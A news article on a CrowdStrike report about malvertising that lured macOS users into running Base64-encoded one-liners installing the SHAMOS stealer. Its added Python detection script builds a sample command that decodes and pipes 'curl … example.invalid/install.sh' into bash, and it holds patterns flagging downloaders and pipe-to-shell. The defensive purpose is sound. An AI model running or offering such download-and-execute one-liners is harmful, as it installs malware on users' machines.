Malicious macOS help sites spread infostealer malware in targeted campaign
In a recent blog post, cybersecurity firm CrowdStrike revealed details of a sophisticated malvertising campaign that targeted hundreds of organizations between June and August 2025. The aim of the campaign was to infect victims with the SHAMOS variant of the Atomic macOS Stealer, an infostealer developed by the malware-as-a-service group Cookie Spider.
The malicious ads appeared in Google search results in various locations including the UK, Japan, China, Colombia, Canada, Mexico, Italy and others. Victims were diverted to fraudulent macOS help websites and encouraged to execute a malicious one-line installation command.
When executed, this command decodes a Base64-encoded string and downloads a file from the attacker-controlled domain. The downloaded file is a Bash script that captures the user's password and then downloads a SHAMOS Mach-O executable from the same domain.
Since first reporting on this type of campaign in June 2025, CrowdStrike's Counter Adversary Operations has continued to observe eCrime threat actors leveraging malicious GitHub repositories to prompt victims to execute commands that download SHAMOS. The technique allows cybercriminals to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices.
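As an added illustration that is not part of CrowdStrike's report, the check below shows how a defender could scan collected shell command lines (from EDR process telemetry or shell history) for the one-liner shape described above: a Base64 blob decoded on the host and piped into a shell, whose decoded contents in turn fetch and execute something. The sample command, URL and domain are constructed here and are not the campaign's real indicators.

```python
import base64
import re

# Patterns for the one-liner described above: a Base64 blob that is decoded
# on the victim's machine and fed to a shell, which then fetches more code.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")   # GNU and macOS spellings
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")


def decode_blobs(cmd: str) -> list[str]:
    """Return every Base64 run in cmd that decodes to readable text."""
    decoded = []
    for match in B64_BLOB.finditer(cmd):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not Base64, or binary: not the text one-liner we look for
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def assess_command(cmd: str) -> list[str]:
    """Score one shell command line; an empty list means nothing suspicious."""
    findings = []
    if B64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        findings.append("base64-decode output is piped into a shell")
    for text in decode_blobs(cmd):
        if DOWNLOADER.search(text):
            findings.append("decoded payload runs a downloader: " + text.split()[0])
        if PIPE_TO_SHELL.search(text):
            findings.append("decoded payload pipes a download into a shell")
    return findings


# Constructed samples (hypothetical; not the campaign's real command or domain).
_PAYLOAD = "curl -fsSL https://example.invalid/install.sh | bash"
SAMPLE_SUSPECT = "echo '%s' | base64 -d | bash" % base64.b64encode(_PAYLOAD.encode()).decode()
SAMPLE_BENIGN = "brew install wget"

if __name__ == "__main__":
    for sample in (SAMPLE_SUSPECT, SAMPLE_BENIGN):
        print(sample[:60], "->", assess_command(sample) or "clean")
```

The decode step matters because the first layer of the command contains no URL at all; only the decoded text reveals the download.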
It's worth noting that no victims were located in Russia, likely due to Russian eCrime forums prohibiting commodity malware operators from targeting users based in Russia.
Previously, Cuckoo Stealer and SHAMOS operators have leveraged this method in Homebrew malvertising campaigns between May 2024 and January 2025. CrowdStrike's Counter Adversary Operations has assessed with high confidence that eCrime actors are likely to continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers.
CrowdStrike blocked the malvertising campaign from attempting to compromise over 300 of its customer environments during this period. The group behind the campaign distributing the SHAMOS variant of the Atomic macOS Stealer between June and August 2025 is the cybercriminal group known as Cookie Spider.
This campaign underscores the popularity of malicious one-line installation commands among eCrime actors, and serves as a reminder for macOS users to be vigilant when clicking links from unknown sources and executing commands from suspicious websites. Verifying the authenticity of websites and keeping security software up to date remain the recommended protections against such threats.